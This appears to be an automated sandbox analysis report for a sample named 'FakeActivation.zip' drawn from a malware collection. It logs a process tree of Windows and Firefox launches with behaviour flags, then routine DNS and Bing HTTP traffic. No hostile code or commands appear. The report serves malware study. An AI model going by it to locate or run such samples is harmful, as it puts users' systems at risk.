C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5980 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\trojans\FakeActivation.zip.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F"2⤵PID:6044
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\trojans\FakeActivation.zip.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F3⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:6060 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6060.0.1007408472\1895880720" -parentBuildID 20221007134813 -prefsHandle 1908 -prefMapHandle 1900 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {04c7f397-317a-4586-824b-d15908f03d2c} 6060 "\\.\pipe\gecko-crash-server-pipe.6060" 1996 1c34fddab58 gpu4⤵PID:1652
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6060.1.1907941635\1593183214" -parentBuildID 20221007134813 -prefsHandle 2408 -prefMapHandle 2404 -prefsLen 21565 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dc650b1b-9373-44cf-b907-cbc64ae499ec} 6060 "\\.\pipe\gecko-crash-server-pipe.6060" 2420 1c34fd0d558 socket4⤵
- Checks processor information in registry
PID:5336
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6060.2.322164931\1348379782" -childID 1 -isForBrowser -prefsHandle 3148 -prefMapHandle 3144 -prefsLen 21668 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {64308117-bae7-49d7-9ab3-72a8d44de7b8} 6060 "\\.\pipe\gecko-crash-server-pipe.6060" 3160 1c353bf0f58 tab4⤵PID:5480
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6060.3.1324552861\586830481" -childID 2 -isForBrowser -prefsHandle 3560 -prefMapHandle 3556 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {38217f9b-0da8-410b-9e50-0ff10e149154} 6060 "\\.\pipe\gecko-crash-server-pipe.6060" 3572 1c3527b1358 tab4⤵PID:780
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6060.4.1844477753\1883515050" -childID 3 -isForBrowser -prefsHandle 5136 -prefMapHandle 5124 -prefsLen 26300 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {81062cf9-6374-443d-8eab-d3252192fd55} 6060 "\\.\pipe\gecko-crash-server-pipe.6060" 5148 1c355c70158 tab4⤵PID:4296
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6060.6.233521590\787955002" -childID 5 -isForBrowser -prefsHandle 5476 -prefMapHandle 5480 -prefsLen 26300 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aa1709dd-bcc0-4a4f-a5e7-3ca84321e3ea} 6060 "\\.\pipe\gecko-crash-server-pipe.6060" 5560 1c35754d558 tab4⤵PID:5940
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6060.5.727122108\453618100" -childID 4 -isForBrowser -prefsHandle 5284 -prefMapHandle 5288 -prefsLen 26300 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {72b04a4b-58d8-4837-baf0-0ad796b4a11b} 6060 "\\.\pipe\gecko-crash-server-pipe.6060" 5276 1c35688b958 tab4⤵PID:4536
-
-
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5748
Network
-
Remote address:8.8.8.8:53Request9.228.82.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestg.bing.comIN AResponseg.bing.comIN CNAMEg-bing-com.a-0001.a-msedge.netg-bing-com.a-0001.a-msedge.netIN CNAMEdual-a-0001.a-msedge.netdual-a-0001.a-msedge.netIN A204.79.197.200dual-a-0001.a-msedge.netIN A13.107.21.200
-
Remote address:8.8.8.8:53Request173.178.17.96.in-addr.arpaIN PTRResponse173.178.17.96.in-addr.arpaIN PTRa96-17-178-173deploystaticakamaitechnologiescom
-
GEThttps://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=84e55726917d44439c9dfb8d26f423e8&localId=w:011BA1D4-FCB1-62A8-177E-91C13F9689FB&deviceId=6966557510629837&anid=Remote address:204.79.197.200:443RequestGET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=84e55726917d44439c9dfb8d26f423e8&localId=w:011BA1D4-FCB1-62A8-177E-91C13F9689FB&deviceId=6966557510629837&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=22CADF89924367791C80CBBD9364667B; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:31 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: D1F224D386424C8189B0DE0630D8F264 Ref B: LON04EDGE0719 Ref C: 2024-02-29T15:31:31Z
date: Thu, 29 Feb 2024 15:31:31 GMT
-
GEThttps://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=84e55726917d44439c9dfb8d26f423e8&localId=w:011BA1D4-FCB1-62A8-177E-91C13F9689FB&deviceId=6966557510629837&anid=Remote address:204.79.197.200:443RequestGET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=84e55726917d44439c9dfb8d26f423e8&localId=w:011BA1D4-FCB1-62A8-177E-91C13F9689FB&deviceId=6966557510629837&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=22CADF89924367791C80CBBD9364667B
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=o6aJIAlsdvr3smnOHIvzjsuYDVD-eDGIKTZRyUWikOc; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:31 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 9ACBD2B20C614980959C51BFD282D840 Ref B: LON04EDGE0719 Ref C: 2024-02-29T15:31:31Z
date: Thu, 29 Feb 2024 15:31:31 GMT
-
GEThttps://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=84e55726917d44439c9dfb8d26f423e8&localId=w:011BA1D4-FCB1-62A8-177E-91C13F9689FB&deviceId=6966557510629837&anid=Remote address:204.79.197.200:443RequestGET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=84e55726917d44439c9dfb8d26f423e8&localId=w:011BA1D4-FCB1-62A8-177E-91C13F9689FB&deviceId=6966557510629837&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=22CADF89924367791C80CBBD9364667B; MSPTC=o6aJIAlsdvr3smnOHIvzjsuYDVD-eDGIKTZRyUWikOc
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: BD42405A4DEB4A85A017D9BC51715657 Ref B: LON04EDGE0719 Ref C: 2024-02-29T15:31:31Z
date: Thu, 29 Feb 2024 15:31:31 GMT
-
Remote address:8.8.8.8:53Request41.110.16.96.in-addr.arpaIN PTRResponse41.110.16.96.in-addr.arpaIN PTRa96-16-110-41deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request203.33.253.131.in-addr.arpaIN PTRResponse203.33.253.131.in-addr.arpaIN PTRa-0003 dc-msedgenet
-
GEThttps://www.bing.com/qbox?query=r&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=813597d0fd7c4c83bd93f0f65f70d7f7&oit=1&cp=1&pgcl=4msedge.exeRemote address:92.123.128.152:443RequestGET /qbox?query=r&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=813597d0fd7c4c83bd93f0f65f70d7f7&oit=1&cp=1&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 65e0a35a0cb64f6ca2d9cc6b5c54956a
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-Ufze6WM+ZRWaEmnH8bvsVotxfZZwON00pMBCSKvswaA='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:31:38 GMT
set-cookie: MUID=158A87BEC6A46EA92BB6938AC7506FB4; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:38 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=158A87BEC6A46EA92BB6938AC7506FB4; expires=Tue, 25-Mar-2025 15:31:38 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=0BF46604D69C603B06E07230D76861EE; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:38 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:38 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:38 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=818F899151FF47259D1F717527452CB9&dmnchg=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:38 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20240229; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:38 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:38 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=0BF46604D69C603B06E07230D76861EE; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220698.b30e5ab
-
GEThttps://www.bing.com/qbox?query=ra&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=d6b3c259745641f5ba46544b324ac9b1&oit=1&cp=2&pgcl=4msedge.exeRemote address:92.123.128.152:443RequestGET /qbox?query=ra&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=d6b3c259745641f5ba46544b324ac9b1&oit=1&cp=2&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 65e0a35bc93a411fa7b36d61cfdca73a
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-CxYPPUz5/s7QWUE1d9trmy/3utCXZDEw3BnvnAG0DVg='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:31:39 GMT
set-cookie: MUID=27BC7972EA2766F71E666D46EB7C6703; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:39 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=27BC7972EA2766F71E666D46EB7C6703; expires=Tue, 25-Mar-2025 15:31:39 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=2A451287E58E6F303FB506B3E4D56EF4; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:39 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:39 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:39 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=12A31E4DD88F4BAC8AF86E18C9EF9D51&dmnchg=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:39 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20240229; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:39 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:39 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=2A451287E58E6F303FB506B3E4D56EF4; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220699.b30eeca
-
GEThttps://www.bing.com/qbox?query=ran&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=b4a68d9f48a94710aa47123c49d0f513&oit=1&cp=3&pgcl=4msedge.exeRemote address:92.123.128.152:443RequestGET /qbox?query=ran&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=b4a68d9f48a94710aa47123c49d0f513&oit=1&cp=3&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 65e0a35bf4fb405690a904eb8be6a479
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-alajVPDbV/oAiqh9cqV+2A3yqhbBc2HrboxlPGEgHto='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:31:39 GMT
set-cookie: MUID=24A0B8C9A27D62FE1586ACFDA3686384; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:39 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=24A0B8C9A27D62FE1586ACFDA3686384; expires=Tue, 25-Mar-2025 15:31:39 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=160E2B105033634D3FE93F245126624C; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:39 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:39 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:39 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=0D4FE108FFBF4E5680BDEABB9E9F0C9E&dmnchg=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:39 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20240229; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:39 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:39 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=160E2B105033634D3FE93F245126624C; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220699.b30f1c4
-
GEThttps://www.bing.com/qbox?query=rand&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=2bd19b7e9ff04ddea55d7e4671acbd46&oit=1&cp=4&pgcl=4msedge.exeRemote address:92.123.128.152:443RequestGET /qbox?query=rand&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=2bd19b7e9ff04ddea55d7e4671acbd46&oit=1&cp=4&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 65e0a35c1bd84b1abe568d682f1ca6f3
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-JucxxpwcHAJtB5ydkiVqqS3Eox+h1NsJ76C5o0btKzA='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:31:40 GMT
set-cookie: MUID=11D3B18A421A671C20DAA5BE434366C7; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:40 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=11D3B18A421A671C20DAA5BE434366C7; expires=Tue, 25-Mar-2025 15:31:40 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=28D59B026E1A69AC3BF58F366F4368A1; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:40 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:40 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:40 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=022393284D75406B973CD37F3DD1F572&dmnchg=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:40 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20240229; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:40 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:40 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=28D59B026E1A69AC3BF58F366F4368A1; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220699.b30f431
-
GEThttps://www.bing.com/qbox?query=rando&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=fb943bd579fe4dafb2377c59baca13e0&oit=1&cp=5&pgcl=4msedge.exeRemote address:92.123.128.152:443RequestGET /qbox?query=rando&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=fb943bd579fe4dafb2377c59baca13e0&oit=1&cp=5&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 65e0a35c600c4e1593bb209d3107ff61
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-XpVLl7RGUAA/vZIOU65WAzMZ+wRcoiuyBO7m/x3RUeg='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:31:40 GMT
set-cookie: MUID=2CFB6534817564B60476710080AF651F; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:40 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=2CFB6534817564B60476710080AF651F; expires=Tue, 25-Mar-2025 15:31:40 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=0E6536A83DAB6CB937CB229C3C716DD0; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:40 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:40 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:40 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=EEF43CC31F4740E19588BABE5FCF9BE9&dmnchg=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:40 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20240229; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:40 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:40 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=0E6536A83DAB6CB937CB229C3C716DD0; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220700.b30f5a0
-
GEThttps://www.bing.com/qbox?query=random&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=e598abb6362241cab48165f45089cf03&oit=1&cp=6&pgcl=4msedge.exeRemote address:92.123.128.152:443RequestGET /qbox?query=random&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=e598abb6362241cab48165f45089cf03&oit=1&cp=6&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 65e0a35d1e9c4a9fa55c70f87d123acd
